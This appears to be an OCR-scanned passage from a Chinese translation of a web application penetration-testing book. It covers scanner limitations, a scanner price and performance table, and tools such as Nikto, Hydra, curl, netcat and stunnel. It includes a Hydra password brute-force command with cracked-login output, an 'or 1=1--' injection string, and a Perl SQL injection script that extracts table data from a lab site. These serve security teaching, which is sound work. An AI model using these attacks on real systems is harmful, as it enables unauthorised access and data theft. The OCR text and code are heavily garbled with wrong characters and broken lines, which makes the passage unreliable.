常 ， 应 用 程序 的 绝 大 多 数 功 能 只 有 使 用 通过 验证 的 会 话 才能 访问 ; 如 果 
扫描 右 不 能 获得 这 样 的 会 话 ， 它 束 会 遗漏 许多 可 以 探测 的 漏洞 。 

当前 ， 扫 描 峰 用 户 通 过 提供 一 段 登 录 脚 本 ， 或 者 使 用 内 置 的 浏览 器 
完成 验证 过 程 ， 帮 助 扫 描 嚣 按照 特定 的 步 又 获得 通过 验证 的 会 话 ， 从 而 












































解决 验证 方面 的 问题 。 

会 话 处 理 方面 的 挑战 更 难以 解决 ， 包 括 以 下 两 个 问题 。 

口 扫 描 右 必须 能 够 与 应 用 程序 使 用 的 会 话 处 理 机 制 交 互 。 这 可 能 要 
求 在 cookie、 隐 藏 表单 字段 或 URL 查 询 字 符 串 中 传送 会 话 令 牌 。 令 牌 可 
能 在 整个 会 话 过 程 中 保持 静态 ， 或 者 根据 每 个 请 求 而 发 生变 化 ， 或 者 应 
用 程序 可 能 会 采用 一 种 完全 不 同 的 定制 机 制 。 

口 如 有 果 会 话 已 经 失效 ， 扫 描 露 必须 能 够 了 解 这 一 情况 ， 并 返回 到 验 
证 阶段 获得 一 个 新 的 会 话 。 造 成 会 话 失 效 的 原因 很 多 ， 例 如 ， 因 为 扫描 
器 请 求 了 退出 功能 ， 或 者 因为 扫描 喜 进 行 了 反常 导航 或 提交 了 东 种 无 效 
的 输入 ， 导 致 应 用 程序 终止 了 会 话 。 在 最 初 解析 应 用 程序 及 随后 探查 漏 
洞 的 过 程 中 ， 扫 描 器 必须 能 够 探测 到 这 两 种 情况 。 如 果 会 话 失 效 ， 不 同 
的 应 用 程序 会 表现 出 不 同 的 行为 ;而 扫描 需 也 只 会 分 析 应 用 程序 啊 应 的 
语法 内 容 。 通 种 而 言 ， 这 可 能 是 一 个 难以 应 对 的 挑 成 ， 应 用 程序 使 用 非 
标准 的 会 话 处 理 机 制 时 尤其 如 此 。 

公平 地 讲 ， 今 天 的 一 些 扫描 器 能 够 检测 出 应 用 程序 采用 的 绝 大 多 数 
验证 和 会 话 处 理 机 制 。 但 是 ， 仍 然 存 在 许多 扫描 器 无 法 处 理 的 情况 。 因 
Ue, “EAT AY BE FCI IT Bk A Fi DY FA EP ET © a A Si 
fir TEE VA HANIT, AL Pa ME DAS DEX PHRA o 
2. 人 危险 的 后 果 

在 许多 应 用 程序 中 ， 不 遵循 任何 指导 而 进行 无 限制 的 扫描 ， 可 能 会 
给 应 用 程序 及 其 包含 的 数据 带 来 极 大 的 风险 。 例 如 ， 扫 描 才 可 能 会 发 现 
一 个 包含 重 设 密码 、 删 除 账户 等 功能 的 管理 页 面 。 扫 描 融 盲目 地 请 求 每 
一 项 功能 可 能 会 导致 应 用 程序 拒绝 所 有 用 户 的 访问 请 求 。 同 样 ， 扫 描 器 
可 能 会 及 现 一 个 可 被 用 于 严重 破坏 应 用 程序 数据 的 漏洞 。 例 如 ， 在 一 些 
SQL 注入 漏洞 中 ， 提 交 标 准 的 SQL 攻击 字符 串 《〈《 如 or 1=1--) 可 能 会 使 应 
用 程序 的 数据 遭受 无 法 预料 的 操作 。 这 时 ， 知 道 基 项 特殊 功能 的 作用 的 

会 谨慎 行事 ， 但 目 动 扫描 器 却 缺乏 这 种 认识 。 
3. “个 性 化 ?功能 
_ 许 多 时 候 ， 纯 粹 对 应 用 程序 进行 语法 分 析 并 不 能 准确 判定 它 的 核心 


功能 : 

口 一 些 应 用 程序 虽 包 含 数目 庞大 的 内 容 ， 但 它们 体现 的 却 是 一 组 相 
同 的 核心 功能 。 例 如 ，eBay、MySpace 与 Amazon 这 些 应 用 程序 含有 数 
百 万 个 包含 不 同 UREL 与 内 容 的 不 同 应 用 程序 页 面 ， 但 这 些 页 面 仅 对 应 少 
数 几 个 应 用 程序 功能 。 

口 如 果 仅 从 语法 角度 分 析 ， 一 些 应 用 程序 可 能 并 没有 明确 的 边界 。 
例如 ， 日 历 应 用 程序 允许 用 户 导航 至 任何 日 期 。 同 样 ， 一 些 内 容 有 限 的 
应 用 程序 在 不 同 的 场合 采用 易 变 的 URL 或 请 求 参数 访问 相同 的 内 容 ， 导 






































致 扫描 器 继续 对 应 用 程序 的 内 容 进 行 不 确定 的 解析 。 

口 扫 摘 吉本 喘 的 操作 可 能 会 导致 一 些 似乎 是 全 新 的 内 容 出 现 。 例 
如 ， 提 交 一 个 表单 可 能 会 使 应 用 程序 在 界面 上 显示 一 个 新 的 链接 ， 访 问 
这 个 链接 可 能 会 获得 另外 一 个 作用 相同 的 表单 。 

在 上 述 任何 一 种 情况 下 ， 渗 透 测试 员 能 够 立即 “看 透 " 应 用 程序 的 请 
Aa 

| 这 一 点 。 

除 上 述 解析 和 探查 应 用 程序 过 程 中 出 现 的 明显 问题 外 ， 在 报告 已 发 
现 的 漏洞 过 程 中 也 出 现 了 一 个 相关 的 问题 : 纯粹 基于 语法 进行 分 析 的 扫 
描 器 很 可 能 会 重复 报告 同一 个 漏洞 。 例 如 ， 一 个 扫描 报告 确定 了 200 个 
XSS 漏 洞 ， 其 中 有 195 个 出 现在 扫 朱 器 多 次 探查 的 同一 项 应 用 程序 功能 
中 ， 因 为 这 个 漏洞 通过 不 同 的 语法 内 容 出 现在 不 同 的 场合 中 。 

4. 其 他 自动 控制 挑战 

我 们 在 第 14 章 讲 过 ， 一 些 应 用 程序 会 实施 专门 的 防御 措施 ， 防 止 上 自 
动 化 客户 端 程序 访问 它们 。 这 些 措施 包括 : 遇 到 反 名 行为 时 反应 性 地 终 
ee 
PE LL o 

通常 ， 扫 描 器 的 抓 取 功能 面临 和 Web 应 用 程序 爬虫 相同 的 挑战 ， 如 
定制 化 “未 发 现 ? 啊 应 ， 能 够 解释 客户 端 代 码 。 许 多 应 用 程序 对 特殊 的 输 
入 项 〈 例 如， 用 户 注 册 表 单 中 的 字段 ) BEAT ERS TA. WSR MG a K 
单 提交 无 效 的 输入 ， 并 且 不 能 理解 应 用 程序 生成 的 错误 消息 ， 那 么 它 就 
无 法 通过 这 个 表单 访问 它 之 后 的 一 些 重要 功能 。 

Web 技 术 的 快速 发 展 ， 特 别 是 各 种 浏览 器 扩展 组 件 和 其 他 框 以 在 客 
户 端 上 的 应 用 ， 使 大 多 数 扫描 器 都 落后 于 最 新 的 技术 发 展 趋势 。 这 会 导 
致 扫描 器 无 法 确定 在 应 用 程序 中 提出 的 所 有 相关 请 求 ， 或 无 法 确定 应 用 
程序 请 求 所 需 的 准确 格式 和 内 容 。 

此 外 ， 当 前 Web 应 用 程序 高 度 状 态 化 ， 以 及 复杂 数据 在 客户 端 和 服 
务 器 端 上 保存 并 通过 这 二 者 之 间 的 异步 通信 进行 更 新 的 特点 ， 都 会 为 大 
多 数 倾 癌 于 单独 处 理 每 个 请 求 的 全 自动 扫 拉 器 制造 问题 。 为 完全 涵盖 这 
些 应 用 程序 ， 通 党 有 必要 了 解 它 们 采用 的 多 阶段 请 求 过 程 ， 并 确保 应 用 
程序 处 于 所 需 的 状态 ， 以 处 理 特定 的 攻击 请 求 。 我 们 在 第 14 章 介绍 了 在 
定制 的 自动 化 攻击 中 实现 这 一 目标 的 技巧 。 通 常 ， 采 用 这 些 技巧 需要 进 
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WER, Hwet TRKE, BH SAFEST, 

AMME- AAS TAA mo LAR ee EB ie EET fii a: 

UD Acunetix 

UD AppScan 

UD Burp Scanner 

D Hailstorm 

D NetSparker 

DQ N-Stalker 

D NTOSpider 

口 Skipfish 

口 WebInspect 

虽然 大 多 数 成 熟 扫描 堪 都 具备 相同 的 核心 功能 ， 但 是 ， 在 如 何 检测 
不 同 漏洞 区 域 ， 以 及 癌 用 尸 提供 的 功能 方面 ， 这 些 扫描 需 之 间 仍 然 存 在 
差异 。 有 关 不 同 扫描 器 的 优点 的 公开 讨论 大 多 以 供应 商 之 间 的 口水 战 而 
结束 。 尽 管 人 们 进行 了 各 种 测试 来 评估 不 同 扫描 需 在 检测 不 同类 型 的 安 
全 漏洞 方面 的 性 能 ， 但 是 ， 这 类 测试 始终 仅 限 于 将 扫描 器 用 于 扫 插 一 小 
段 存在 缺陷 的 示例 代码 ， 因 此 ， 这 些 测试 结果 并 不 足以 推 呆 扫描 器 在 各 
种 实际 情况 下 的 性 能 。 

最 有 效 的 测试 方法 ， 是 针对 大 量 源 自 真实 应 用 程序 的 示例 代码 运行 
扫描 器 ， 而 不 是 在 分 析 之 玉 为 供应 商 提 供 基 于 示例 代码 调 侣 其 产品 的 机 
会 。 加 州 大 学 对 区 芭 拉 分 校 的 一 项 此 类 学 术 研究 声称 其 “在 所 测试 的 工 
具 数 量 oe 以 及 所 分 析 的 漏洞 类 型 方面 ， 是 最 大 规模 的 Web 应 用 程序 扫 
描 堪 评估 ”。 有 关 此 项 研究 的 报告 ， 请 从 以 下 URL PR: 

www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf 

这 项 研究 的 主要 结论 如 下 : 

口 即使 是 最 先进 的 扫描 器 ， 也 无 法 检测 出 所 有 类 型 的 漏洞 ， 包 括 脆 
弱 密 码 、 访 问 控制 不 完善 和 逻辑 缺陷 。 

口 由 于 对 常用 客户 病 技 术 文 持 不 完全 ， 以 及 当前 应 用 程序 的 复杂 状 
态 化 特点 ， 就 目前 的 Web 漏洞 扫 摘 器 而 言 ， 抓 取现 代 Web 应 用 程序 可 能 
是 一 项 严峻 的 挑战 。 

口 价 格 与 性 能 之 间 并 没有 明显 的 对 应 关系 。 一 些 免 费 或 价格 非常 低 
廉 的 扫描 霹 与 那些 售 价 数 千 美元 的 扫描 才 的 性 能 相当 。 

基于 扫描 器 确定 不 同类 型 漏洞 的 能 力 ， 这 项 研究 对 扫描 器 进 行 了 打 
To BERETA TH at AS SOD AL AR OZ 20-1 ATA 























表 20-1 UCSB 针 对 不 同 扫描 器 的 漏洞 检测 性 能 与 价格 的 研究 报告 


H H 器 分 数 价 格 


Acunetix 14 4995 ~~ 6350% 70 
WebInspect 13 6000 ~ 30 000 美 元 
Burp Scanner 13 191 美 元 

N-Stalker 13 899 ~ 629952 70 
AppScan 10 17 550~32 5005276 
waat 9 免费 

Paros 6 免费 

HailStorm 6 10 000 美 元 
NTOSpider 4 10 000 美 元 
MileSCAN 4 495~ 14955270 
Grendel-Scan 3 免费 


需要 注意 的 是 ， 近 年 来 ， 扫 描 器 的 扫描 能 力 已 有 了 显著 提高 ， 并 可 
能 会 继续 改进 。 个 体 扫描 器 的 性 能 和 价格 可 能 会 随时 间 而 变化 。 表 20-1 
中 的 报告 信息 于 2010 年 6 月 公布 。 

由 于 有 关 Web 漏 洞 扫 描 器 性 能 的 公开 信息 相对 较 少 ， 因 此 ， 在 做 出 
购买 决策 之 前 ， 渗 透 测试 员 需 要 自己 进行 这 方面 的 调查 。 大 多 数 扫描 器 
供应 商都 提供 详细 的 产品 文档 及 其 软件 的 试用 版 本 ， 渗 透 测 试 员 可 以 利 
用 这 些 信息 做 出 产品 选择 。 
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ELSE TOL T, BEH Das TA Fa tii ae FY OCR RIR KTE EIR eb ot 
的 是 何 种 应 用 程序 。 根 据 应 用 程序 的 功能 及 其 包含 的 漏洞 种 类 ， 我 们 上 
面 介绍 的 扫描 器 的 内 在 优 缺 点 会 以 不 同 的 方式 影响 不 同 的 应 用 程序 。 

对 于 Web 应 用 程序 中 存在 的 各 种 常见 漏洞 ， 上 自动 扫描 需 能 够 发 现 其 
中 大 约 一 半 的 漏洞 ， 它 们 大 多 都 带 有 一 个 标准 签名 。 在 扫描 恬 能 够 探测 
到 的 各 种 漏洞 中 ， 尽 管 会 遗漏 那些 难以 发 现 与 不 常见 的 漏洞 ， 但 它们 能 
够 很 好 地 确认 特定 的 漏洞 。 总 之 ， 进 行 自 动 扫描 能 够 确定 一 个 第 见 应 用 
程序 中 存在 的 一 些 但 并 非 全 部 明显 的 漏洞 。 

如 打 是 一 名 渗透 测试 新 手 ， 或 者 需要 在 有 限 的 时 间 内 攻击 一 个 大 型 
应 用 程序 ， 那 么 进行 目 动 扫 擅 的 好 处 极其 明显 ， 因 为 它 能 够 迅速 确定 一 


























些 需 要 进行 深入 手动 调查 的 线索 ， 并 帮助 初步 确定 应 用 程序 的 安全 状态 
以 及 其 中 存在 的 漏洞 类 型 。 它 还 可 帮助 全 面 了 解 目标 应 用 程序 ， 并 确定 
任何 需要 仔细 分 析 的 特殊 区 域 。 
如 果 是 一 名 Web 应 用 程序 渗透 测试 专家 ， 并 且 和 希望 从 目标 应 用 程序 
中 发 现 尽 可 能 多 的 漏洞 ， 那 么 ， 需 要 认识 漏洞 扫描 融 的 内 在 局 限 性 ， 并 
且 不 能 完全 相信 它们 ， 认 为 它们 能 够 发 现 每 一 个 漏 调 。 虽 然 扫 描 结 果 会 
有 所 帮助 ， 并 提示 手动 调查 一 些 特殊 的 问题 ， 但 是 ， 通 第 我 们 希望 对 应 
用 程序 的 每 个 功能 区 域 进行 测试 ， 但 找 每 一 种 类 型 的 漏洞 ， 以 确信 对 其 
进行 了 全 面 的 扫描 。 
人 ieee ae ee eee een 
LA. 
口 了 解 扫描 器 能 够 确定 和 不 能 够 确定 的 漏洞 类 型 。 
口 熟悉 扫描 器 的 功能 ， 知 道 如 何 对 其 进行 配置 ， 对 茶 个 应 用 程序 进 
行 有 效 扫 描 。 
口 在 运行 扫 搞 器 之 前 全 面 了 解 目标 应 用 程序 ， 以 充分 利用 扫 朱 吉 的 


口 了 解 抓 取 强大 的 功能 和 自动 探查 危险 漏洞 级 含 的 风险 。 
口 始 终 手 动 核 实 扫 描 峰 报告 的 所 有 潜在 的 漏洞 。 
口 还 要 意识 到 ， 扫 描 器 可 能 会 造成 极 大 的 混乱 ， 在 服务 器 与 IDS 防 
御 中 留 下 大 量 “ 指 纹 ”。 如 有 果 想 要 保持 隐秘 ， 不 要 使 用 扫描 器 。 
全 上 自动 化 扫描 与 用 户 指导 的 扫描 
在 使 用 web 扫描 需 时 ， 一 个 主要 的 考虑 事项 ， 是 渗透 测试 员 希 望 在 
多 大 程度 上 指导 扫描 器 完成 各 种 工作 。 这 方面 的 两 个 极端 用 例如 下 。 
口 为 扫描 需 提 供应 用 程序 的 URL， 单 击 “ 开 始 ”(Go) ， 然 后 等 每 结 
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名 更 适 于 第 二 种 用 例 。 也 残 是 说 ， 如 果 需 要 ， 可 以 结合 采用 这 两 类 扫 搬 
ae 


如 采用 户 对 于 Web 应 用 程序 安全 不 其 了 解 ， 或 需要 快速 评估 某 个 应 
用 程序 ， 或 需要 经 常 处 理 大 量 应 用 程序 ， 则 可 以 通过 全 目 动 化 扫描 了 解 
应 用 程序 的 一 部 分 受 攻 击 面 。 这 样 做 有 助 于 用 户 在 确定 更 全 面 测 试 的 效 
率 时 做 出 明智 的 决策 。 

如 琳 用 户 了 解 Web 应 用 程序 安全 测试 的 整个 过 程 ， 以 及 全 目 动 化 测 
试 的 限制 ， 则 最 好 是 使 用 集成 测试 套件 中 的 扫描 硕 ， 从 而 为 手动 测试 过 
程 提 供 文 持 ， 并 提高 手动 测试 的 效率 。 这 种 方法 有 助 于 避免 全 目 动 扫描 
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作 ， 以 确保 不 会 遗漏 关键 的 功能 区 域 。 渗 透 测试 员 可 以 直接 测试 应 用 程 
序 生 成 的 、 其 中 包含 应 用 程序 所 需 的 正确 内 容 和 请 求 格式 。 由 于 能 够 完 
全 控制 测试 过 程 ， 因 此 能 够 避 开 危险 功能 、 识 别 重 复 功 能 ， 并 避 开 目 动 
扫描 峰 可 能 会 遇 到 困难 的 任何 输入 确认 。 此 外 ， 由 于 可 以 收 到 有 关 扫 描 
独活 动 的 直接 反馈 ， 因 而 可 以 确保 避免 与 验证 和 会 话 处 理 机 制 有 关 的 问 
题 ， 并 确保 正确 处 理 多 阶段 过 程 和 有 状态 功能 造成 的 问题 。 通 过 以 这 种 
方式 使 用 扫描 器 ， 可 以 覆盖 一 系列 可 以 目 动 进行 检 训 的 重要 漏洞 ， 从 而 
能 够 查找 再 要 智慧 和 经 验 才能 发 现 的 漏洞 类 型 。 





20.4 其 他 工具 


除 前 面 讨论 的 工具 外 ， 在 特殊 情况 下 或 执行 特殊 任务 时 渗透 测试 员 
还 可 以 使 用 许多 其 他 工具 。 在 本 章 的 剩余 部 分 ， 我 们 将 介绍 其 他 几 种 攻 
击 应 用 程序 时 可 能 遇 到 或 需要 使 用 的 工具 。 需 要 注意 的 是 ， 以 下 内 容 仅 
仅 简 要 介绍 了 笔者 曾 使 用 的 一 些 工 具 。 建 议 渗透 测试 员 调 查 各 种 可 用 的 
工具 ， 并 选择 最 适合 自己 需求 和 测试 风格 的 那些 工具 。 


20.4.1 Wikto/Nikto 


Nikto 可 确定 Web 服 务 器 上 默认 或 常见 的 第 三 方 内 容 。 它 包含 一 个 大 
型 文件 和 目录 数据 库 ， 其 中 含有 Web 服 务 器 上 的 默认 页 面 与 脚本 以 及 购 
物 篮 之 类 的 第 三 方 软件 。 基 本 上 ， 这 个 工具 轮流 请 求 上 述 每 一 种 项 目 ， 
然后 探查 它们 是 否 存在 。 

数据 库 会 频繁 更 新 ， 这 意味 着 Nikto 能 够 比 其 他 任何 自动 或 手动 技 
巧 更 有 效 地 确定 这 种 类 型 的 内 容 。 

Nikto 包 含 大 量 可 通过 命令 行 或 基于 文本 的 配置 文件 指定 的 配置 选 
项 。 如 果 应 用 程序 使 用 定制 化 “未 发 现 ” 页 面 ， 渗 透 测 试 员 可 以 通过 使 
ee ee 
的 字符 串 。 

Wikto 是 Nikto 的 Windows 版 本 ， 该 版 本 新 增 了 一 些 功 能 ， 如 增强 了 
对 “未 发 现 ” 响 应 的 检测 和 Google 辅 助 的 目录 挖掘 。 

















20.4.2 Firebug 


Firebug 是 一 种 浏览 器 调试 工具 ， 使 用 它 可 以 在 当前 显示 的 页 面 上 调 
试 和 编辑 HTML 及 JavaScript 脚 本 ， 还 可 以 通过 它 浏览 和 编辑 DOM 。 

Firebug 具 有 非常 强大 的 功能 ， 可 用 于 分 析 和 利用 一 系列 客户 端 攻 
击 ， 包 括 各 种 跨 站 点 脚本 、 请 求 伪 造 、UI 伪 装 和 跨 域 数据 捕获 攻击 (如 
第 13 章 所 述 ) 。 


20.4.3 Hydra 


Hydra 是 一 种 用 途 广泛 的 密码 猜测 工具 ， 可 用 于 攻击 Web 应 用 程序 
常用 的 基于 表单 的 验证 。 当 然 ， 也 可 以 使 用 Burp Intruder 之 类 的 工具 以 





fle teen 但 是 ， 在 许多 情况 下 ，Hydra 也 一 样 有 


”可 以 使 用 Hydra 指 定 目标 URL、 相 关 请 求 参数 、 攻 击 用户 名 和 密码 
字段 的 单词 列表 ， 以 及 登录 失败 后 返回 的 错误 消息 细节 。_t 设 置 可 用 于 
指定 在 攻击 中 使 用 的 并 行 线程 的 数量 。 例 如 ， 


C:\>hydra.exe -t 32 -L user.txt -P password.txt wahh-app.com http-post~-form 
*"/login. asp: login_name=“USER“&login_password=“PASS*kLogin=Legin;: Invalid" 
Hydra v6.4 (c) 2011 by van Hauser / THC - use allowed only for legal 
purpose 

Hydra ttg t rq) y at 20 5 É 

[DATA] 32 tasks, 1 servers, 21904 login tries (1:148/p:148}, ~684 tries per 
task 

[ attacking ht t-form t 80 

TATUS | 90 tries/min, 3 ri in OO ) d n 00:55h 

[80] [www-form] host: 65.61.137.117 ogin: alice password: password 
[80] [www-form] host: 65.61.137.1 yin pas rd: password 
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根据 我 们 的 经 验 ， 现 有 的 各 种 非 定 制 工 具足 以 帮助 渗透 测试 员 完 成 
在 攻击 Web 应 用 程序 时 所 需 执行 的 绝 大 多 数 任务 。 但 是 ， 在 各 种 反常 情 
况 下 ， 需 要 目 行 建立 完全 定制 的 工具 和 脚本 来 解决 特定 的 问题 ， 如 下 所 


示 。 

口 应 用 程序 使 用 一 种 不 常见 的 会 话 处 理 机 制 ， 例 如 ， 需 要 使 用 必须 
按 正 确 顺 序 重 新 提交 的 每 页 面 令 有 牌 。 

口 希 望 利用 一 个 需要 重复 执行 几 个 特殊 步骤 的 漏洞 ， 将 在 一 个 啊 应 
获取 的 数据 合并 到 随后 的 请 求 中 。 

口 如 果 确 定 一 个 潜在 恶意 的 请 求 ， 应 用 程序 会 立即 终止 会 话 ;， 同 
时 ， 获 得 一 个 新 的 通过 验证 的 会 话 需 要 采取 几 个 非 标准 的 步骤 。 

口 需要 同 应 用 程序 所 有 者 提供 “指向 并 单 击 * 利 用 过 程 ， 以 演示 该 漏 
洞 及 其 风险 。 

如 果 会 编程 ， 那 么 解决 这 个 问题 的 最 简单 方法 ， 就 是 创建 一 个 完 
定制 的 小 型 程序 ， 使 用 它 发 布 相关 请 求 并 处 理应 用 程序 的 啊 应 。 可 以 把 
这 个 程序 作为 一 个 独立 的 工具 ， 或 者 作为 前 面 描述 的 集成 测试 套件 的 扩 
展 ， 例 如 ， 通 过 使 用 Burp Extender 接 口 扩展 Burp Suite 或 Bean Shell 接 口 
扩展 WebScarab。 

Perl 等 脚本 语言 包含 许多 可 用 于 迅速 建 六 HTTP 通 信 的 库 ; 通常 ， 仪 
使 用 几 行 代码 就 可 以 执行 定制 任务 。 即 使 编程 经 验 有 限 ， 也 可 以 在 因 特 
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网 上 找到 一 段 肢 本， 然后 对 其 进行 调整 ， 以 满足 需求 。 下 面 以 一 段 简单 
的 Perl 脚 本 为 例 ， 它 利用 一 个 登录 表单 中 的 SQL 注入 漏洞 进行 递归 碍 
询 ， 获 取 数 据 表 中 指定 列 中 的 所 有 值 ， 并 将 获得 的 值 从 大 到 小 排列 《请 
参阅 第 9 草 了 解 这 种 攻击 的 更 多 详情 ) : 

use HTTP: :Request: :Common; 

use LWP: :UserAgent ; 








$ua = LWP: :UserAgent->new() ; 
my $col = @GARGV[1]; 
my $from_stmt = @ARGV[3]; 


if (S$#ARGV!=3) { 
print “usage: perl sql.pl SELECT column FROM table\n"; 
exit; 


while(1) 
{ 


$payload = "foo' or (1 in (select max($col) from $from stmt 
$test))--"; 


my $req = POST “http://mdisec.net/addressbook/32/Default.aspx", 
{[_VIEWSTATE => '', Name => $payload, Email => ‘john@test. 

Com', Phone => 

'12345', Search => ‘Search', Address => '1 High Street‘, Age => 

"S01 

my $resp = $ua->request ($req) ; 

my $content = $resp->as_string; 

#print $content; 


if ($content =~ /nvarchar value ' (.*)'/) 
{ 
print "$i\n"; # print the extracted match 
} 
else 
{exit; } 


Stest = "where $col < '$1' "; 


} 


Al, yn vw) 
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除 内 置 命令 与 库 外 ， 还 可 以 从 Perl 脚 本 与 操作 系统 shell 脚 本 中 调用 
各 种 简单 的 工具 和 实用 工具 。 下 面 分 别 介 绍 几 个 这 样 的 工具 。 

1. Wget 

Wget 是 一 个 有 用 的 工具 ， 可 使 用 HTTP 或 HTTPS 获 取 一 个 特殊 的 
URL。 它 支持 “下 行 ” 代 理 服务 器 、HTTP 验 证 和 其 他 各 种 配置 选项 。 

2. curl 

curl 是 一 个 用 于 发 布 HTTP 与 HTTPS 请 求 的 最 灵活 的 命令 行 工 具 。 它 
支持 GET 方 法 、POST 方 法 、 请 求 参数 、 客 户 问 SSL 证 书 和 HTTP 验 证 。 
在 下 面 的 示例 中 ， 重 复 检 索 页 面 标 题 ， 以 获得 10 一 40 之 间 的 页 面 ID 值 。 


#!/bin/bash 








£ in “seq 10 40°; 

ae 

echo -n $i *: ” 

curl s http: //mdsec.net/app/ShowPage.ashx?PageNo==$i | grep -Fo 
"<title>(.*)</title>" NV POAR 人 Mist" 


Al, yn vw) 
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3. netcat 

netcat 是 一 个 功能 非常 强大 的 工具 ， 可 用 于 执行 各 种 与 网 络 有 关 的 
任务 ; 它 还 是 许多 初学 者 攻击 教程 的 基础 。 可 以 使 用 它 与 服务 器 建立 
TCP 连 接 ， 发 送 一 个 请 求 并 获得 它 的 啊 应 。 除 以 上 用 途 外 ，netcat 还 可 
用 于 在 计算 机 上 创建 网 络 监听 器 ， 接 收 所 攻击 的 服务 器 建立 的 连接 。 请 
‘ogi 了 解 使 用 这 种 技巧 在 数据 库 攻 击 中 创建 一 个 带 外 通道 的 实 
Hl o 
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合 ， 即 可 建立 SSL 连 接 。 

4. stunnel 

stunnel 在 使 用 自己 的 脚本 或 其 他 本 身 并 不 支持 HTTPS 连 接 的 工具 时 
非常 有 用 。stunnel 可 帮助 渗透 测试 员 与 任何 主机 或 服务 器 SSL 套 接 字 建 
立 客户 端 $SSL 连 接 ， 以 监听 任何 客户 端 提 出 的 连接 请 求 。 由 于 HTTPS 只 
是 一 种 通过 SSL 传送 的 简单 HTTP 协 议 ， 因 此 可 以 使 用 stunnel 为 任何 其 他 
工具 提供 HTTPS 能 力 。 

例如 ， 下 和 面 的 命令 配置 stunnel 在 本 地 回环 接口 的 88 端 口上 建立 一 个 
简单 的 TCP 服 务 器 套 接 字 。 当 收 到 一 个 连接 时 ， 它 再 与 位 于 wahh- 
app.com 的 服务 器 进行 SSL 协 议 ， 通 过 SSL 信 道 将 进入 的 明文 连接 转送 到 
这 个 服务 器 : 








现在 ， 可 以 将 任何 没有 SSL 能 力 的 工具 指向 回环 接口 的 88 端 口 ， 使 
它 通 过 HTTPS 与 目标 服务 右 建 立 通 信 ， 代 码 如 下 : 
2011.01.08 15:33:20 LOGS[1288:;1000]: wahh-app.com.443 connected 
from Tet OO AE LIS 
2011.01.08 15:33:26 LOG5[1288:1000]: Connection closed: 16 bytes 
sent to SSL, 392 bytes sent to socket 


20.5 小结 


本 书 主 要 介绍 的 是 攻击 Web 应 用 程序 时 渗透 测试 员 可 以 使 用 的 实用 
技巧 。 尺 管 只 需要 使 用 一 个 浏览 占 束 可 以 完成 其 中 一 些 任 务 ,， 但 是 ， 要 
对 应 用 程序 实施 全 面 有 效 的 攻击 ， 需 要 使 用 一 些 有 用 的 工具 。 

拦截 代理 服务 器 是 工具 包 中 最 重要 、 也 是 必 不 可 少 的 工具 ， 可 以 使 
用 它 人 查看 和 修改 浏览 器 与 服务 器 之 间 传 送 的 所 有 流量 。 今 天 的 代理 服务 
名 还 与 大 量 其 他 集成 工具 相互 补充 ， 这 些 工 具 可 帮助 渗透 测试 员 目 动 完 
成 所 需要 执行 的 许多 任务 。 除 使 用 上 述 工具 套件 外 ， 还 需要 使 用 一 个 或 
ee eee ee 
实施 攻击 。 

Web 应 用 程序 扫描 器 是 另 一 种 重要 工具 。 这 些 工 具 能 够 迅速 有 效 地 
发 现 一 系列 第 见 的 漏洞 ， 并 且 能 够 解析 和 分 析 应 用 程序 的 功能 。 即 便 如 
此 ， 还 是 有 许多 安全 漏洞 它们 根本 无 法 确定 ; 因此， 绝 不 能 依赖 它 来 确 
保 任 何 应 用 程序 的 安全 。 

最 后 ， 要 成 为 一 名 技术 熟练 的 Web 应 用 程序 渗透 测试 员 ， 还 必须 了 
解 Web 应 用 程序 的 运行 机 制 、 它 们 的 防御 机 制 的 弱点 ， 并 了 解 如 何 探查 
其 中 存在 的 可 被 利用 的 漏洞 。 为 了 有 效 地 完成 这 些 任务 ， 震 要 一 些 工 
具 ， 以 了 解 应 用 程序 的 逻辑 ， 准 确 控制 与 应 用 程序 的 交互 ， 并 在 必要 时 
利用 自动 控制 迅速 可 靠 地 实施 攻击 。 那 些 对 实现 这 些 目标 最 有 帮助 的 工 
有 其 ， 束 是 最 适合 使 用 的 工具 。 此 外 ， 如 果 现 有 的 工具 并 不 能 满足 需求 ， 
也 可 以 建立 自己 的 工具 。 事 实 上 ， 做 到 这 一 点 并 不 是 很 困难 ! 





























Web 应 用 程序 渗透 测试 方法 论 


间 介 绍 一 种 详细 的 进 阶 方法 论 ， 渗 透 测试 员 在 攻击 Web 应 用 程 
序 时 可 将 其 作为 指导 思想 。 它 涵盖 了 本 书 描述 的 所 有 漏洞 与 攻击 技巧 。 
虽然 执行 这 个 方法 论 中 的 所 有 步骤 并 不 能 确保 发 现 茶 个 应 用 程序 中 的 所 
有 漏洞 ， 但 是 ， 它 可 以 帮助 探查 应 用 程序 受 攻击 面 的 所 有 必要 区 域 ， 并 
i Ee a 
RUE. 
这 种 方法 论 探查 的 主要 区 域 如 图 21-1 所 示 。 根 据 这 张 图 ， 我 们 将 深 
入 分 析 每 一 个 区 域 ， 并 举例 说 明 其 中 的 每 一 项 任务 。 图 中 的 数字 与 后 文 
中 该 方法 论 使 用 的 分 级 数字 目录 相互 对 应 ， 方 便 读者 找到 相关 内 容 。 
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图 21-1 本 章 讨论 的 方法 论 中 包含 的 主要 区 域 

这 个 方法 论 中 的 一 系列 任务 根据 它们 之 间 的 逻辑 依赖 关系 组 织 和 排 
序 。 我 们 将 尽 可 能 在 任务 插 述 中 重点 介绍 这 些 依赖 关系 。 但 是 ， 实 际 
上 ， 渗 透 测试 员 往 往 需 要 发 挥 目 己 的 想象 ， 思 考 应 采取 的 攻击 方向 ， 并 
根据 所 发 现 的 有 关 目 标 应 用 程序 的 信息 指导 攻击 方向 ， 如 下 所 示 。 

口 在 茶 一 个 阶段 收集 到 的 信息 有 助 于 返回 到 前 一 个 阶段 ， 以 设计 更 
有 针对 性 的 攻击 。 例 如 ， 渗 透 测 试 员 可 以 利用 访问 控制 漏洞 获得 所 有 用 
户 的 列表 ， 针 对 验证 功能 实施 更 有 效 的 密码 猜测 攻击 。 

口 在 应 用 程序 的 某 个 区 域 发现 的 一 个 关键 漏洞 可 简化 对 另 一 个 区 域 
的 攻击 。 例 如 ， 渗 透 测 试 员 可 以 利用 文件 泄露 漏洞 对 应 用 程序 的 关键 功 
能 进行 代码 审查 ， 而 不 是 盲目 地 探 碍 这 些 功能 。 

口 一 些 区 域 的 测试 结果 有 助 于 确定 在 其 他 区 域 可 立即 探查 出 的 重复 
出 现 的 漏洞 模式 。 例 如 ， 渗 透 测试 员 可 以 利用 应 用 程序 输入 确认 过 小 中 
